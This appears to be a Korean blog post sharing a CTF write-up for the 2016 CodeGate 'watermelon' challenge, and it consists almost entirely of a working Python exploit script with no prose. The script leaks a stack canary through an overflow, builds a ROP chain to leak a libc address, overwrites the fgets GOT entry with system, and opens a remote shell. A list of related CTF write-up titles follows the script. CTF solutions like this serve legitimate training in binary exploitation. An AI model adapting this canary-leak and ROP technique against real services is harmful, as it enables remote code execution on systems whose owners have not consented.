본문 바로가기

Write Up

2016 CodeGate watermelon exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
from SunKn0wn import *
 
= remote('192.168.179.135'1111)
 
def add(music, artist):
    r.recvuntil('select\t|\t\n')
    r.sendline('1')
    r.recvuntil('music\t|\t')
    r.sendline(music)
    r.recvuntil('artist\t|\t')
    r.sendline(artist)
 
def view():
    r.recvuntil('select\t|\t\n')
    r.sendline('2')
 
def modify(number, music, artist):
    r.recvuntil('select\t|\t\n')
    r.sendline('3')
    r.recvuntil('number\t|\t\n')
    r.sendline(str(number))
    r.recvuntil('music\t|\t')
    r.sendline(music)
    r.recvuntil('artist\t|\t')
    r.sendline(artist)
 
def exit():
    r.recvuntil('select\t|\t\n')
    r.sendline('4')
    r.recvuntil('BYE\n\n')
 
def attack():
    fgets_plt = 0x08048520
    write_plt = 0x08048590
    read_plt = 0x080484F0
    fgets_got = 0x0804C018
    write_got = 0x804C034
    pppr = 0x08049ACD
    bss = 0x0804D7A0
 
    r.recvuntil('name : ')
    r.sendline('/bin/sh')
 
    ########## Canary Leak ##########
    print "*** Stage1 ***"
    for i in range(100): add('5unKn0wn''pwned')
    modify(100'SuperHacker''A' * 0x14)
    view()
    r.recvuntil('A' * 0x14)
    canary = (up32(r.recv(4)) >> 8<< 8
    print "\n[*] canary : " + hex(canary)
 
    ########## ROP ##########
    print "\n*** Stage2 ***"
    payload = p32(write_plt)
    payload += p32(pppr)
    payload += p32(1)
    payload += p32(write_got)
    payload += p32(4)                # write(1, write_got, 4);
    payload += p32(read_plt)
    payload += p32(pppr)
    payload += p32(0)
    payload += p32(fgets_got)
    payload += p32(4)                # read(0, fgets_got, 4);
    payload += p32(fgets_plt)
    payload += 'AAAA'
    payload += p32(bss)                # fgets(bss); -> system("/bin/sh");
 
    modify(100'SuperHacker''A' * 0x14 + p32(canary) + 'A' * 0xc + payload)
    exit()
    write_lib = up32(r.recv(4))
    lib_base = write_lib - 0xDAC50    # write_lib offset
    system_lib = lib_base + 0x40190    # system_lib offset
    print "[*] write_lib : " + hex(write_lib)
    print "[*] lib_base : " + hex(lib_base)
    print "[*] system_lib : " + hex(system_lib)
    sleep(0.2)
    r.sendline(p32(system_lib))
    print "\n*** Get Shell ***"
    r.interactive()
 
attack()
cs


'Write Up' 카테고리의 다른 글

PlaidCTF 2016 quite quixotic quest - 300pt  (0) 2016.04.18
PlaidCTF 2016 quick - 175pt  (0) 2016.04.18
2016 CodeGate bugbug exploit  (1) 2016.04.01
2016 CodeGate fl0ppy exploit  (1) 2016.04.01
2016 Sharif CTF Write-Ups  (0) 2016.02.07